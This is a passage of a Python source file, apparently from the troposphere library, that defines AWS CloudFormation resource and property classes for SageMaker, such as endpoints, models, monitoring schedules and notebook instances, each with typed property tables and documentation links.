`DataQualityAppSpecification <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-dataqualityjobdefinition-dataqualityappspecification.html>`__
"""
props: PropsDictType = {
"ContainerArguments": ([str], False),
"ContainerEntrypoint": ([str], False),
"Environment": (dict, False),
"ImageUri": (str, True),
"PostAnalyticsProcessorSourceUri": (str, False),
"RecordPreprocessorSourceUri": (str, False),
}
class ConstraintsResource(AWSProperty):
"""
`ConstraintsResource <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-monitoringschedule-constraintsresource.html>`__
"""
props: PropsDictType = {
"S3Uri": (str, False),
}
class StatisticsResource(AWSProperty):
"""
`StatisticsResource <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-monitoringschedule-statisticsresource.html>`__
"""
props: PropsDictType = {
"S3Uri": (str, False),
}
class DataQualityBaselineConfig(AWSProperty):
"""
`DataQualityBaselineConfig <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-dataqualityjobdefinition-dataqualitybaselineconfig.html>`__
"""
props: PropsDictType = {
"BaseliningJobName": (str, False),
"ConstraintsResource": (ConstraintsResource, False),
"StatisticsResource": (StatisticsResource, False),
}
class EndpointInput(AWSProperty):
"""
`EndpointInput <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-monitoringschedule-endpointinput.html>`__
"""
props: PropsDictType = {
"EndpointName": (str, True),
"LocalPath": (str, True),
"S3DataDistributionType": (str, False),
"S3InputMode": (str, False),
}
class DataQualityJobInput(AWSProperty):
"""
`DataQualityJobInput <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-dataqualityjobdefinition-dataqualityjobinput.html>`__
"""
props: PropsDictType = {
"EndpointInput": (EndpointInput, True),
}
class S3Output(AWSProperty):
"""
`S3Output <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-monitoringschedule-s3output.html>`__
"""
props: PropsDictType = {
"LocalPath": (str, True),
"S3UploadMode": (str, False),
"S3Uri": (str, True),
}
class MonitoringOutput(AWSProperty):
"""
`MonitoringOutput <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-monitoringschedule-monitoringoutput.html>`__
"""
props: PropsDictType = {
"S3Output": (S3Output, True),
}
class MonitoringOutputConfig(AWSProperty):
"""
`MonitoringOutputConfig <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-monitoringschedule-monitoringoutputconfig.html>`__
"""
props: PropsDictType = {
"KmsKeyId": (str, False),
"MonitoringOutputs": ([MonitoringOutput], True),
}
class ClusterConfig(AWSProperty):
"""
`ClusterConfig <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-monitoringschedule-clusterconfig.html>`__
"""
props: PropsDictType = {
"InstanceCount": (integer, True),
"InstanceType": (str, True),
"VolumeKmsKeyId": (str, False),
"VolumeSizeInGB": (integer, True),
}
class MonitoringResources(AWSProperty):
"""
`MonitoringResources <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-monitoringschedule-monitoringresources.html>`__
"""
props: PropsDictType = {
"ClusterConfig": (ClusterConfig, True),
}
class VpcConfig(AWSProperty):
"""
`VpcConfig <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-monitoringschedule-vpcconfig.html>`__
"""
props: PropsDictType = {
"SecurityGroupIds": ([str], True),
"Subnets": ([str], True),
}
class NetworkConfig(AWSProperty):
"""
`NetworkConfig <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-monitoringschedule-networkconfig.html>`__
"""
props: PropsDictType = {
"EnableInterContainerTrafficEncryption": (boolean, False),
"EnableNetworkIsolation": (boolean, False),
"VpcConfig": (VpcConfig, False),
}
class StoppingCondition(AWSProperty):
"""
`StoppingCondition <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-monitoringschedule-stoppingcondition.html>`__
"""
props: PropsDictType = {
"MaxRuntimeInSeconds": (integer, True),
}
class DataQualityJobDefinition(AWSObject):
"""
`DataQualityJobDefinition <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-sagemaker-dataqualityjobdefinition.html>`__
"""
resource_type = "AWS::SageMaker::DataQualityJobDefinition"
props: PropsDictType = {
"DataQualityAppSpecification": (DataQualityAppSpecification, True),
"DataQualityBaselineConfig": (DataQualityBaselineConfig, False),
"DataQualityJobInput": (DataQualityJobInput, True),
"DataQualityJobOutputConfig": (MonitoringOutputConfig, True),
"JobDefinitionName": (str, False),
"JobResources": (MonitoringResources, True),
"NetworkConfig": (NetworkConfig, False),
"RoleArn": (str, True),
"StoppingCondition": (StoppingCondition, False),
"Tags": (Tags, False),
}
class DeviceProperty(AWSProperty):
"""
`DeviceProperty <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-device-device.html>`__
"""
props: PropsDictType = {
"Description": (str, False),
"DeviceName": (str, True),
"IotThingName": (str, False),
}
class Device(AWSObject):
"""
`Device <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-sagemaker-device.html>`__
"""
resource_type = "AWS::SageMaker::Device"
props: PropsDictType = {
"Device": (DeviceProperty, False),
"DeviceFleetName": (str, True),
"Tags": (Tags, False),
}
class EdgeOutputConfig(AWSProperty):
"""
`EdgeOutputConfig <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-devicefleet-edgeoutputconfig.html>`__
"""
props: PropsDictType = {
"KmsKeyId": (str, False),
"S3OutputLocation": (str, True),
}
class DeviceFleet(AWSObject):
"""
`DeviceFleet <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-sagemaker-devicefleet.html>`__
"""
resource_type = "AWS::SageMaker::DeviceFleet"
props: PropsDictType = {
"Description": (str, False),
"DeviceFleetName": (str, True),
"OutputConfig": (EdgeOutputConfig, True),
"RoleArn": (str, True),
"Tags": (Tags, False),
}
class JupyterServerAppSettings(AWSProperty):
"""
`JupyterServerAppSettings <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-userprofile-jupyterserverappsettings.html>`__
"""
props: PropsDictType = {
"DefaultResourceSpec": (ResourceSpec, False),
}
class CustomImage(AWSProperty):
"""
`CustomImage <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-userprofile-customimage.html>`__
"""
props: PropsDictType = {
"AppImageConfigName": (str, True),
"ImageName": (str, True),
"ImageVersionNumber": (integer, False),
}
class KernelGatewayAppSettings(AWSProperty):
"""
`KernelGatewayAppSettings <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-userprofile-kernelgatewayappsettings.html>`__
"""
props: PropsDictType = {
"CustomImages": ([CustomImage], False),
"DefaultResourceSpec": (ResourceSpec, False),
}
class SharingSettings(AWSProperty):
"""
`SharingSettings <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-userprofile-sharingsettings.html>`__
"""
props: PropsDictType = {
"NotebookOutputOption": (str, False),
"S3KmsKeyId": (str, False),
"S3OutputPath": (str, False),
}
class UserSettings(AWSProperty):
"""
`UserSettings <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-userprofile-usersettings.html>`__
"""
props: PropsDictType = {
"ExecutionRole": (str, False),
"JupyterServerAppSettings": (JupyterServerAppSettings, False),
"KernelGatewayAppSettings": (KernelGatewayAppSettings, False),
"SecurityGroups": ([str], False),
"SharingSettings": (SharingSettings, False),
}
class Domain(AWSObject):
"""
`Domain <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-sagemaker-domain.html>`__
"""
resource_type = "AWS::SageMaker::Domain"
props: PropsDictType = {
"AppNetworkAccessType": (str, False),
"AuthMode": (str, True),
"DefaultUserSettings": (UserSettings, True),
"DomainName": (str, True),
"KmsKeyId": (str, False),
"SubnetIds": ([str], True),
"Tags": (Tags, False),
"VpcId": (str, True),
}
class Alarm(AWSProperty):
"""
`Alarm <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-endpoint-alarm.html>`__
"""
props: PropsDictType = {
"AlarmName": (str, True),
}
class AutoRollbackConfig(AWSProperty):
"""
`AutoRollbackConfig <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-endpoint-autorollbackconfig.html>`__
"""
props: PropsDictType = {
"Alarms": ([Alarm], True),
}
class CapacitySize(AWSProperty):
"""
`CapacitySize <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-endpoint-capacitysize.html>`__
"""
props: PropsDictType = {
"Type": (str, True),
"Value": (integer, True),
}
class TrafficRoutingConfig(AWSProperty):
"""
`TrafficRoutingConfig <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-endpoint-trafficroutingconfig.html>`__
"""
props: PropsDictType = {
"CanarySize": (CapacitySize, False),
"LinearStepSize": (CapacitySize, False),
"Type": (str, True),
"WaitIntervalInSeconds": (integer, False),
}
class BlueGreenUpdatePolicy(AWSProperty):
"""
`BlueGreenUpdatePolicy <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-endpoint-bluegreenupdatepolicy.html>`__
"""
props: PropsDictType = {
"MaximumExecutionTimeoutInSeconds": (integer, False),
"TerminationWaitInSeconds": (integer, False),
"TrafficRoutingConfiguration": (TrafficRoutingConfig, True),
}
class DeploymentConfig(AWSProperty):
"""
`DeploymentConfig <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-endpoint-deploymentconfig.html>`__
"""
props: PropsDictType = {
"AutoRollbackConfiguration": (AutoRollbackConfig, False),
"BlueGreenUpdatePolicy": (BlueGreenUpdatePolicy, True),
}
class VariantProperty(AWSProperty):
"""
`VariantProperty <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-endpoint-variantproperty.html>`__
"""
props: PropsDictType = {
"VariantPropertyType": (str, False),
}
class Endpoint(AWSObject):
"""
`Endpoint <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-sagemaker-endpoint.html>`__
"""
resource_type = "AWS::SageMaker::Endpoint"
props: PropsDictType = {
"DeploymentConfig": (DeploymentConfig, False),
"EndpointConfigName": (str, True),
"EndpointName": (str, False),
"ExcludeRetainedVariantProperties": ([VariantProperty], False),
"RetainAllVariantProperties": (boolean, False),
"RetainDeploymentConfig": (boolean, False),
"Tags": (Tags, False),
}
class AsyncInferenceClientConfig(AWSProperty):
"""
`AsyncInferenceClientConfig <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-endpointconfig-asyncinferenceclientconfig.html>`__
"""
props: PropsDictType = {
"MaxConcurrentInvocationsPerInstance": (integer, False),
}
class AsyncInferenceNotificationConfig(AWSProperty):
"""
`AsyncInferenceNotificationConfig <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-endpointconfig-asyncinferencenotificationconfig.html>`__
"""
props: PropsDictType = {
"ErrorTopic": (str, False),
"SuccessTopic": (str, False),
}
class AsyncInferenceOutputConfig(AWSProperty):
"""
`AsyncInferenceOutputConfig <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-endpointconfig-asyncinferenceoutputconfig.html>`__
"""
props: PropsDictType = {
"KmsKeyId": (str, False),
"NotificationConfig": (AsyncInferenceNotificationConfig, False),
"S3OutputPath": (str, True),
}
class AsyncInferenceConfig(AWSProperty):
"""
`AsyncInferenceConfig <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-endpointconfig-asyncinferenceconfig.html>`__
"""
props: PropsDictType = {
"ClientConfig": (AsyncInferenceClientConfig, False),
"OutputConfig": (AsyncInferenceOutputConfig, True),
}
class CaptureContentTypeHeader(AWSProperty):
"""
`CaptureContentTypeHeader <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-endpointconfig-datacaptureconfig-capturecontenttypeheader.html>`__
"""
props: PropsDictType = {
"CsvContentTypes": ([str], False),
"JsonContentTypes": ([str], False),
}
class CaptureOption(AWSProperty):
"""
`CaptureOption <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-endpointconfig-captureoption.html>`__
"""
props: PropsDictType = {
"CaptureMode": (str, True),
}
class DataCaptureConfig(AWSProperty):
"""
`DataCaptureConfig <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-endpointconfig-datacaptureconfig.html>`__
"""
props: PropsDictType = {
"CaptureContentTypeHeader": (CaptureContentTypeHeader, False),
"CaptureOptions": ([CaptureOption], True),
"DestinationS3Uri": (str, True),
"EnableCapture": (boolean, False),
"InitialSamplingPercentage": (integer, True),
"KmsKeyId": (str, False),
}
class ServerlessConfig(AWSProperty):
"""
`ServerlessConfig <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-endpointconfig-productionvariant-serverlessconfig.html>`__
"""
props: PropsDictType = {
"MaxConcurrency": (integer, True),
"MemorySizeInMB": (integer, True),
}
class ProductionVariant(AWSProperty):
"""
`ProductionVariant <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-endpointconfig-productionvariant.html>`__
"""
props: PropsDictType = {
"AcceleratorType": (str, False),
"InitialInstanceCount": (integer, False),
"InitialVariantWeight": (double, True),
"InstanceType": (str, False),
"ModelName": (str, True),
"ServerlessConfig": (ServerlessConfig, False),
"VariantName": (str, True),
}
class EndpointConfig(AWSObject):
"""
`EndpointConfig <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-sagemaker-endpointconfig.html>`__
"""
resource_type = "AWS::SageMaker::EndpointConfig"
props: PropsDictType = {
"AsyncInferenceConfig": (AsyncInferenceConfig, False),
"DataCaptureConfig": (DataCaptureConfig, False),
"EndpointConfigName": (str, False),
"KmsKeyId": (str, False),
"ProductionVariants": ([ProductionVariant], True),
"Tags": (Tags, False),
}
class FeatureDefinition(AWSProperty):
"""
`FeatureDefinition <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-featuregroup-featuredefinition.html>`__
"""
props: PropsDictType = {
"FeatureName": (str, True),
"FeatureType": (str, True),
}
class FeatureGroup(AWSObject):
"""
`FeatureGroup <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-sagemaker-featuregroup.html>`__
"""
resource_type = "AWS::SageMaker::FeatureGroup"
props: PropsDictType = {
"Description": (str, False),
"EventTimeFeatureName": (str, True),
"FeatureDefinitions": ([FeatureDefinition], True),
"FeatureGroupName": (str, True),
"OfflineStoreConfig": (dict, False),
"OnlineStoreConfig": (dict, False),
"RecordIdentifierFeatureName": (str, True),
"RoleArn": (str, False),
"Tags": (Tags, False),
}
class Image(AWSObject):
"""
`Image <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-sagemaker-image.html>`__
"""
resource_type = "AWS::SageMaker::Image"
props: PropsDictType = {
"ImageDescription": (str, False),
"ImageDisplayName": (str, False),
"ImageName": (str, True),
"ImageRoleArn": (str, True),
"Tags": (Tags, False),
}
class ImageVersion(AWSObject):
"""
`ImageVersion <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-sagemaker-imageversion.html>`__
"""
resource_type = "AWS::SageMaker::ImageVersion"
props: PropsDictType = {
"BaseImage": (str, True),
"ImageName": (str, True),
}
class RepositoryAuthConfig(AWSProperty):
"""
`RepositoryAuthConfig <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-model-containerdefinition-imageconfig-repositoryauthconfig.html>`__
"""
props: PropsDictType = {
"RepositoryCredentialsProviderArn": (str, True),
}
class ImageConfig(AWSProperty):
"""
`ImageConfig <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-model-containerdefinition-imageconfig.html>`__
"""
props: PropsDictType = {
"RepositoryAccessMode": (str, True),
"RepositoryAuthConfig": (RepositoryAuthConfig, False),
}
class MultiModelConfig(AWSProperty):
"""
`MultiModelConfig <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-model-containerdefinition-multimodelconfig.html>`__
"""
props: PropsDictType = {
"ModelCacheSetting": (str, False),
}
class ContainerDefinition(AWSProperty):
"""
`ContainerDefinition <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-model-containerdefinition.html>`__
"""
props: PropsDictType = {
"ContainerHostname": (str, False),
"Environment": (dict, False),
"Image": (str, False),
"ImageConfig": (ImageConfig, False),
"InferenceSpecificationName": (str, False),
"Mode": (str, False),
"ModelDataUrl": (str, False),
"ModelPackageName": (str, False),
"MultiModelConfig": (MultiModelConfig, False),
}
class InferenceExecutionConfig(AWSProperty):
"""
`InferenceExecutionConfig <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-model-inferenceexecutionconfig.html>`__
"""
props: PropsDictType = {
"Mode": (str, True),
}
class Model(AWSObject):
"""
`Model <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-sagemaker-model.html>`__
"""
resource_type = "AWS::SageMaker::Model"
props: PropsDictType = {
"Containers": ([ContainerDefinition], False),
"EnableNetworkIsolation": (boolean, False),
"ExecutionRoleArn": (str, True),
"InferenceExecutionConfig": (InferenceExecutionConfig, False),
"ModelName": (str, False),
"PrimaryContainer": (ContainerDefinition, False),
"Tags": (Tags, False),
"VpcConfig": (VpcConfig, False),
}
class ModelBiasAppSpecification(AWSProperty):
"""
`ModelBiasAppSpecification <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-modelbiasjobdefinition-modelbiasappspecification.html>`__
"""
props: PropsDictType = {
"ConfigUri": (str, True),
"Environment": (dict, False),
"ImageUri": (str, True),
}
class ModelBiasBaselineConfig(AWSProperty):
"""
`ModelBiasBaselineConfig <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-modelbiasjobdefinition-modelbiasbaselineconfig.html>`__
"""
props: PropsDictType = {
"BaseliningJobName": (str, False),
"ConstraintsResource": (ConstraintsResource, False),
}
class MonitoringGroundTruthS3Input(AWSProperty):
"""
`MonitoringGroundTruthS3Input <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-modelqualityjobdefinition-monitoringgroundtruths3input.html>`__
"""
props: PropsDictType = {
"S3Uri": (str, True),
}
class ModelBiasJobInput(AWSProperty):
"""
`ModelBiasJobInput <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-modelbiasjobdefinition-modelbiasjobinput.html>`__
"""
props: PropsDictType = {
"EndpointInput": (EndpointInput, True),
"GroundTruthS3Input": (MonitoringGroundTruthS3Input, True),
}
class ModelBiasJobDefinition(AWSObject):
"""
`ModelBiasJobDefinition <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-sagemaker-modelbiasjobdefinition.html>`__
"""
resource_type = "AWS::SageMaker::ModelBiasJobDefinition"
props: PropsDictType = {
"JobDefinitionName": (str, False),
"JobResources": (MonitoringResources, True),
"ModelBiasAppSpecification": (ModelBiasAppSpecification, True),
"ModelBiasBaselineConfig": (ModelBiasBaselineConfig, False),
"ModelBiasJobInput": (ModelBiasJobInput, True),
"ModelBiasJobOutputConfig": (MonitoringOutputConfig, True),
"NetworkConfig": (NetworkConfig, False),
"RoleArn": (str, True),
"StoppingCondition": (StoppingCondition, False),
"Tags": (Tags, False),
}
class ModelExplainabilityAppSpecification(AWSProperty):
"""
`ModelExplainabilityAppSpecification <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-modelexplainabilityjobdefinition-modelexplainabilityappspecification.html>`__
"""
props: PropsDictType = {
"ConfigUri": (str, True),
"Environment": (dict, False),
"ImageUri": (str, True),
}
class ModelExplainabilityBaselineConfig(AWSProperty):
"""
`ModelExplainabilityBaselineConfig <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-modelexplainabilityjobdefinition-modelexplainabilitybaselineconfig.html>`__
"""
props: PropsDictType = {
"BaseliningJobName": (str, False),
"ConstraintsResource": (ConstraintsResource, False),
}
class ModelExplainabilityJobInput(AWSProperty):
"""
`ModelExplainabilityJobInput <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-modelexplainabilityjobdefinition-modelexplainabilityjobinput.html>`__
"""
props: PropsDictType = {
"EndpointInput": (EndpointInput, True),
}
class ModelExplainabilityJobDefinition(AWSObject):
"""
`ModelExplainabilityJobDefinition <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-sagemaker-modelexplainabilityjobdefinition.html>`__
"""
resource_type = "AWS::SageMaker::ModelExplainabilityJobDefinition"
props: PropsDictType = {
"JobDefinitionName": (str, False),
"JobResources": (MonitoringResources, True),
"ModelExplainabilityAppSpecification": (
ModelExplainabilityAppSpecification,
True,
),
"ModelExplainabilityBaselineConfig": (ModelExplainabilityBaselineConfig, False),
"ModelExplainabilityJobInput": (ModelExplainabilityJobInput, True),
"ModelExplainabilityJobOutputConfig": (MonitoringOutputConfig, True),
"NetworkConfig": (NetworkConfig, False),
"RoleArn": (str, True),
"StoppingCondition": (StoppingCondition, False),
"Tags": (Tags, False),
}
class ModelPackageGroup(AWSObject):
"""
`ModelPackageGroup <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-sagemaker-modelpackagegroup.html>`__
"""
resource_type = "AWS::SageMaker::ModelPackageGroup"
props: PropsDictType = {
"ModelPackageGroupDescription": (str, False),
"ModelPackageGroupName": (str, True),
"ModelPackageGroupPolicy": (dict, False),
"Tags": (Tags, False),
}
class ModelQualityAppSpecification(AWSProperty):
"""
`ModelQualityAppSpecification <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-modelqualityjobdefinition-modelqualityappspecification.html>`__
"""
props: PropsDictType = {
"ContainerArguments": ([str], False),
"ContainerEntrypoint": ([str], False),
"Environment": (dict, False),
"ImageUri": (str, True),
"PostAnalyticsProcessorSourceUri": (str, False),
"ProblemType": (str, True),
"RecordPreprocessorSourceUri": (str, False),
}
class ModelQualityBaselineConfig(AWSProperty):
"""
`ModelQualityBaselineConfig <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-modelqualityjobdefinition-modelqualitybaselineconfig.html>`__
"""
props: PropsDictType = {
"BaseliningJobName": (str, False),
"ConstraintsResource": (ConstraintsResource, False),
}
class ModelQualityJobInput(AWSProperty):
"""
`ModelQualityJobInput <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-modelqualityjobdefinition-modelqualityjobinput.html>`__
"""
props: PropsDictType = {
"EndpointInput": (EndpointInput, True),
"GroundTruthS3Input": (MonitoringGroundTruthS3Input, True),
}
class ModelQualityJobDefinition(AWSObject):
"""
`ModelQualityJobDefinition <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-sagemaker-modelqualityjobdefinition.html>`__
"""
resource_type = "AWS::SageMaker::ModelQualityJobDefinition"
props: PropsDictType = {
"JobDefinitionName": (str, False),
"JobResources": (MonitoringResources, True),
"ModelQualityAppSpecification": (ModelQualityAppSpecification, True),
"ModelQualityBaselineConfig": (ModelQualityBaselineConfig, False),
"ModelQualityJobInput": (ModelQualityJobInput, True),
"ModelQualityJobOutputConfig": (MonitoringOutputConfig, True),
"NetworkConfig": (NetworkConfig, False),
"RoleArn": (str, True),
"StoppingCondition": (StoppingCondition, False),
"Tags": (Tags, False),
}
class MonitoringExecutionSummary(AWSProperty):
"""
`MonitoringExecutionSummary <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-monitoringschedule-monitoringexecutionsummary.html>`__
"""
props: PropsDictType = {
"CreationTime": (str, True),
"EndpointName": (str, False),
"FailureReason": (str, False),
"LastModifiedTime": (str, True),
"MonitoringExecutionStatus": (str, True),
"MonitoringScheduleName": (str, True),
"ProcessingJobArn": (str, False),
"ScheduledTime": (str, True),
}
class BaselineConfig(AWSProperty):
"""
`BaselineConfig <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-monitoringschedule-baselineconfig.html>`__
"""
props: PropsDictType = {
"ConstraintsResource": (ConstraintsResource, False),
"StatisticsResource": (StatisticsResource, False),
}
class MonitoringAppSpecification(AWSProperty):
"""
`MonitoringAppSpecification <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-monitoringschedule-monitoringappspecification.html>`__
"""
props: PropsDictType = {
"ContainerArguments": ([str], False),
"ContainerEntrypoint": ([str], False),
"ImageUri": (str, True),
"PostAnalyticsProcessorSourceUri": (str, False),
"RecordPreprocessorSourceUri": (str, False),
}
class MonitoringInput(AWSProperty):
"""
`MonitoringInput <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-monitoringschedule-monitoringinput.html>`__
"""
props: PropsDictType = {
"EndpointInput": (EndpointInput, True),
}
class MonitoringJobDefinition(AWSProperty):
"""
`MonitoringJobDefinition <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-monitoringschedule-monitoringjobdefinition.html>`__
"""
props: PropsDictType = {
"BaselineConfig": (BaselineConfig, False),
"Environment": (dict, False),
"MonitoringAppSpecification": (MonitoringAppSpecification, True),
"MonitoringInputs": ([MonitoringInput], True),
"MonitoringOutputConfig": (MonitoringOutputConfig, True),
"MonitoringResources": (MonitoringResources, True),
"NetworkConfig": (NetworkConfig, False),
"RoleArn": (str, True),
"StoppingCondition": (StoppingCondition, False),
}
class ScheduleConfig(AWSProperty):
"""
`ScheduleConfig <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-monitoringschedule-scheduleconfig.html>`__
"""
props: PropsDictType = {
"ScheduleExpression": (str, True),
}
class MonitoringScheduleConfig(AWSProperty):
"""
`MonitoringScheduleConfig <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-monitoringschedule-monitoringscheduleconfig.html>`__
"""
props: PropsDictType = {
"MonitoringJobDefinition": (MonitoringJobDefinition, False),
"MonitoringJobDefinitionName": (str, False),
"MonitoringType": (str, False),
"ScheduleConfig": (ScheduleConfig, False),
}
class MonitoringSchedule(AWSObject):
"""
`MonitoringSchedule <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-sagemaker-monitoringschedule.html>`__
"""
resource_type = "AWS::SageMaker::MonitoringSchedule"
props: PropsDictType = {
"EndpointName": (str, False),
"FailureReason": (str, False),
"LastMonitoringExecutionSummary": (MonitoringExecutionSummary, False),
"MonitoringScheduleConfig": (MonitoringScheduleConfig, True),
"MonitoringScheduleName": (str, True),
"MonitoringScheduleStatus": (str, False),
"Tags": (Tags, False),
}
class NotebookInstance(AWSObject):
"""
`NotebookInstance <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-sagemaker-notebookinstance.html>`__
"""
resource_type = "AWS::SageMaker::NotebookInstance"
props: PropsDictType = {
"AcceleratorTypes": ([str], False),
"AdditionalCodeRepositories": ([str], False),
"DefaultCodeRepository": (str, False),
"DirectInternetAccess": (str, False),
"InstanceType": (str, True),
"KmsKeyId": (str, False),
"LifecycleConfigName": (str, False),
"NotebookInstanceName": (str, False),
"PlatformIdentifier": (str, False),
"RoleArn": (str, True),
"RootAccess": (str, False),
"SecurityGroupIds": ([str], False),
"SubnetId": (str, False),
"Tags": (Tags, False),
"VolumeSizeInGB": (integer, False),
}
class NotebookInstanceLifecycleHook(AWSProperty):
"""
`NotebookInstanceLifecycleHook <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-notebookinstancelifecycleconfig-notebookinstancelifecyclehook.html>`__
"""
props: PropsDictType = {
"Content": (str, False),
}
class NotebookInstanceLifecycleConfig(AWSObject):
"""
`NotebookInstanceLifecycleConfig <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-sagemaker-notebookinstancelifecycleconfig.html>`__
"""
resource_type = "AWS::SageMaker::NotebookInstanceLifecycleConfig"
props: PropsDictType = {
"NotebookInstanceLifecycleConfigName": (str, False),
"OnCreate": ([NotebookInstanceLifecycleHook], False),
"OnStart": ([NotebookInstanceLifecycleHook], False),
}
class Pipeline(AWSObject):
"""
`Pipeline <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-sagemaker-pipeline.html>`__
"""
resource_type = "AWS::SageMaker::Pipeline"
props: PropsDictType = {
"PipelineDefinition": (dict, True),
"PipelineDescription": (str, False),
"PipelineDisplayName": (str, False),
"PipelineName": (str, True),
"RoleArn": (str, True),
"Tags": (Tags, False),
}
class Project(AWSObject):
"""
`Project <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-sagemaker-project.html>`__
"""
resource_type = "AWS::SageMaker::Project"
props: PropsDictType = {
"ProjectDescription": (str, False),
